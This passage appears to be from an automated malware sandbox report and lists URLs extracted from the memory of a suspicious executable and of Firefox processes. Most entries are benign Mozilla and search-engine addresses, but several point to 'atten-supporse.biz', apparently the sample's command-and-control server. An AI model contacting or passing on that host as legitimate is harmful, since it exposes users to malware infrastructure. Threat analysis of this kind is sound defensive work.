Source: a6f0d09f38.exe, 0000000D.00000003.2656994034.0000000005B86000.00000004.00000800.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2678573432.0000000005B85000.00000004.00000800.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2653867084.0000000005B85000.00000004.00000800.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2781341437.0000000005B85000.00000004.00000800.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2627978100.0000000005B84000.00000004.00000800.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2630984251.0000000005B84000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://atten-supporse.biz:443/apiZqY2EqXqknUgpH6oCFyW/SwlkltNsdwG0IiPX9UX11rVdhzlFCaipm6aO0i/7CII7Y
Source: a6f0d09f38.exe, 0000000D.00000003.2656994034.0000000005B86000.00000004.00000800.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2678573432.0000000005B85000.00000004.00000800.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2653867084.0000000005B85000.00000004.00000800.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2781341437.0000000005B85000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://atten-supporse.biz:443/apif0cK3T
Source: a6f0d09f38.exe, 0000000D.00000002.2960178454.00000000012AC000.00000004.00000020.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2894772771.00000000012AA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://atten-supporse.biz:443/apiings
Source: firefox.exe, 0000001C.00000003.2919395940.000001DEF137F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org
Source: firefox.exe, 0000001C.00000003.2919395940.000001DEF137F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org/
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org/update/3/GMP/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL%/%OS_VER
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org/update/3/SystemAddons/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL
Source: firefox.exe, 0000001C.00000002.2978589406.000001DEDEB11000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org/update/6/%PRODUCT%/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL%/%
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.2978589406.000001DEDEB6B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org/update/6/Firefox/118.0.1/20230927232528/WINNT_x86_64-msvc-x64/en-US/release
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://blocked.cdn.mozilla.net/
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://blocked.cdn.mozilla.net/%blockID%.html
Source: a6f0d09f38.exe, 0000000D.00000003.2630984251.0000000005B84000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.2995338805.000001DEEA3AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.2959635118.000001C8C3BC9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2955222099.000001D14E8E9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.2966388065.000001729E803000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
Source: a6f0d09f38.exe, 0000000D.00000003.2630984251.0000000005B84000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.2995338805.000001DEEA3AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.2959635118.000001C8C3BC9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2955222099.000001D14E8E9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.2966388065.000001729E803000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
Source: firefox.exe, 0000001C.00000003.2925812595.000001DEF10B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mo
Source: firefox.exe, 0000001C.00000003.2788053083.000001DEF6BC5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2788136258.000001DEF6BC2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1189266
Source: firefox.exe, 0000001C.00000003.2788053083.000001DEF6BC5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2788136258.000001DEF6BC2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1193802
Source: firefox.exe, 0000001C.00000003.2788053083.000001DEF6BC5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2788136258.000001DEF6BC2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1207993
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADAA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1238180
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADAA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1238180Stale
Source: firefox.exe, 0000001C.00000003.2788053083.000001DEF6BC5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2788136258.000001DEF6BC2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1266220
Source: firefox.exe, 0000001C.00000003.2788053083.000001DEF6BC5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2788136258.000001DEF6BC2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1283601
Source: firefox.exe, 0000001C.00000003.2896162189.000001DEF6989000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2755113615.000001DEF6989000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1539075
Source: firefox.exe, 0000001C.00000003.2896162189.000001DEF6989000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2755113615.000001DEF6989000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1584464
Source: firefox.exe, 0000001C.00000003.2896162189.000001DEF6989000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2755113615.000001DEF6989000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1607439
Source: firefox.exe, 0000001C.00000003.2896162189.000001DEF6989000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2755113615.000001DEF6989000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1616739
Source: firefox.exe, 0000001C.00000003.2788053083.000001DEF6BC5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2788136258.000001DEF6BC2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1678448
Source: firefox.exe, 0000001C.00000003.2788053083.000001DEF6BC5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2788136258.000001DEF6BC2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=792480
Source: firefox.exe, 0000001C.00000003.2788053083.000001DEF6BC5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2788136258.000001DEF6BC2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=809550
Source: firefox.exe, 0000001C.00000003.2788053083.000001DEF6BC5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2788136258.000001DEF6BC2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=840161
Source: a6f0d09f38.exe, 0000000D.00000003.2573722627.0000000005BCC000.00000004.00000800.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2573822622.0000000005BCA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: a6f0d09f38.exe, 0000000D.00000003.2573722627.0000000005BCC000.00000004.00000800.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2573822622.0000000005BCA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: a6f0d09f38.exe, 0000000D.00000003.2573722627.0000000005BCC000.00000004.00000800.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2573822622.0000000005BCA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://color.firefox.com/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_content=theme-f
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2719907749.000001DEEE700000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2720959869.000001DEEC184000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2720400561.000001DEEC141000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2720790655.000001DEEC163000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3010463460.000001DEEAA10000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://completion.amazon.com/search/complete?q=
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://content.cdn.mozilla.net
Source: a6f0d09f38.exe, 0000000D.00000003.2630984251.0000000005B84000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.2995338805.000001DEEA3AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.2959635118.000001C8C3BC9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2955222099.000001D14E8E9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.2966388065.000001729E803000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
Source: a6f0d09f38.exe, 0000000D.00000003.2630984251.0000000005B84000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.2995338805.000001DEEA3AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.2959635118.000001C8C3BC9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2955222099.000001D14E8E9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.2966388065.000001729E803000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: firefox.exe, 0000001C.00000003.2896162189.000001DEF6998000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile.services.mozilla.com
Source: firefox.exe, 0000001C.00000003.2896162189.000001DEF6998000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile.services.mozilla.com/
Source: firefox.exe, 0000001C.00000003.2896162189.000001DEF6998000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://contile.services.mozilla.com/v1/tiles
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://coverage.mozilla.org
Source: firefox.exe, 0000001C.00000002.2978589406.000001DEDEB11000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.2978589406.000001DEDEB30000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://crash-reports.mozilla.com/submit?id=
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://crash-stats.mozilla.org/report/index/
Source: firefox.exe, 0000001C.00000003.2758502866.000001DEF6A39000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2755113615.000001DEF69B4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2756128256.000001DEF6A35000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://crbug.com/993268
Source: 98a7b9f337.exe, 00000022.00000002.2951837128.000000000145A000.00000040.00000001.01000000.0000001B.sdmp, 98a7b9f337.exe, 00000022.00000003.2918095240.0000000007629000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://curl.se/docs/alt-svc.html
Source: 98a7b9f337.exe, 00000022.00000002.2951837128.000000000145A000.00000040.00000001.01000000.0000001B.sdmp, 98a7b9f337.exe, 00000022.00000003.2918095240.0000000007629000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://curl.se/docs/hsts.html
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://dap-02.api.divviup.org
Source: firefox.exe, 0000001C.00000003.2890160247.000001DEF9DEB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2933112137.000001DEF03A6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2792631818.000001DEFA713000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3049413497.000001DEEC2C6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2890160247.000001DEF9D77000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3010463460.000001DEEAA10000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://datastudio.google.com/embed/reporting/
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/Add-ons/WebExtensions/manifest.json/commands#Key_combinations
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/Add-ons/WebExtensions/manifest.json/commands#Key_combinationschr
Source: firefox.exe, 0000001C.00000003.2933112137.000001DEF03B7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2779540484.000001DEF03BF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/docs/Mozilla/Tech/XPCOM/Reference/Interface/nsIEffectiveTLDServi
Source: firefox.exe, 0000001C.00000003.2758502866.000001DEF6A39000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2755113615.000001DEF6998000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2756128256.000001DEF6A35000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/API/ElementCSSInlineStyle/style#setting_styles)
Source: firefox.exe, 0000001C.00000003.2758502866.000001DEF6A39000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2755113615.000001DEF69D7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2756128256.000001DEF6A35000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Statements/for-await...of
Source: firefox.exe, 0000001C.00000003.2758502866.000001DEF6A39000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2755113615.000001DEF69B4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2756128256.000001DEF6A35000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/Web_Components/Using_custom_elements#using_the_lifecycl
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://developers.google.com/safe-browsing/v4/advisory
Source: firefox.exe, 0000001C.00000003.2903058147.000001DEF24F5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2719907749.000001DEEE700000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2933815847.000001DEF0379000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2720959869.000001DEEC184000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2720400561.000001DEEC141000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2720790655.000001DEEC163000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3010463460.000001DEEAA10000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/
Source: firefox.exe, 0000001C.00000003.2903058147.000001DEF24F5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/?t=ffab&q=
Source: a6f0d09f38.exe, 0000000D.00000003.2573722627.0000000005BCC000.00000004.00000800.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2573822622.0000000005BCA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: a6f0d09f38.exe, 0000000D.00000003.2573722627.0000000005BCC000.00000004.00000800.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2573822622.0000000005BCA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: a6f0d09f38.exe, 0000000D.00000003.2573722627.0000000005BCC000.00000004.00000800.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2573822622.0000000005BCA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: firefox.exe, 0000001C.00000002.3010463460.000001DEEAA10000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000003.2755426525.000001DEF693A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/y
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2721477258.000001DEEC933000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2839862901.000001DEEC933000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://e.mail.ru/cgi-bin/sentmsg?mailto=%s
Source: firefox.exe, 0000001C.00000002.2995338805.000001DEEA32D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://e.mail.ru/cgi-bin/sentmsg?mailto=%sz
Source: firefox.exe, 0000001C.00000002.2995338805.000001DEEA32D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://e.mail.ru/cgi-bin/sentmsg?mailto=%szw
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2721477258.000001DEEC933000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2839862901.000001DEEC933000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://email.seznam.cz/newMessageScreen?mailto=%s
Source: firefox.exe, 0000001F.00000002.2955222099.000001D14E812000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.2957984264.000001729E713000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox-api-proxy.cdn.mozilla.net/
Source: firefox.exe, 0000001C.00000003.2760314917.000001DEEFF91000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2761194812.000001DEEFF92000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/ms-images/706c7a85-cf23-442e-8a9
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://firefox-source-docs.mozilla.org/networking/dns/trr-skip-reasons.html#
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD3A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox-source-docs.mozilla.org/remote/Security.html
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox.settings.services.allizom.org/v1/buckets/main-preview/collections/search-config/reco
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox.settings.services.allizom.org/v1/buckets/main/collections/search-config/records
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox.settings.services.mozilla.com/v1/buckets/main-preview/collections/search-config/reco
Source: firefox.exe, 0000001C.00000003.2890160247.000001DEF9DEB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox.settings.services.mozilla.com/v1/buckets/main/collections/ms-language-packs/records/
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox.settings.services.mozilla.com/v1/buckets/main/collections/search-config/records
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox.settings.services.mozilla.com/v1BrowserInitState.startupIdleTaskPromise
Source: firefox.exe, 0000001C.00000002.3025366411.000001DEEB946000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3012755816.000001DEEAC03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3025366411.000001DEEB938000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fpn.firefox.com
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://fpn.firefox.com/browser?utm_source=firefox-desktop&utm_medium=referral&utm_campaign=about-pr
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://ftp.mozilla.org/pub/labs/devtools/adb-extension/#OS#/adb-extension-latest-#OS#.xpi
Source: firefox.exe, 0000001F.00000002.2955222099.000001D14E812000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.2957984264.000001729E713000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/
Source: firefox.exe, 00000021.00000002.2957984264.000001729E7C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/firefox/global-recs?version=3&consumer_key=$apiKey&locale_lang=
Source: firefox.exe, 00000021.00000002.2957984264.000001729E7C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/firefox/trending-topics?version=2&consumer_key=$apiKey&locale_l
Source: firefox.exe, 0000001F.00000002.2955222099.000001D14E82F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.2957984264.000001729E730000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/newtab/layout?version=1&consumer_key=$apiKey&layout_variant=bas
Source: firefox.exe, 0000001C.00000003.2895155915.000001DEF69D7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/career?utm_source=pocket-newtabL
Source: firefox.exe, 0000001C.00000003.2895155915.000001DEF69D7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/entertainment?utm_source=pocket-newtabC
Source: firefox.exe, 0000001C.00000003.2895155915.000001DEF69D7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/food?utm_source=pocket-newtabA
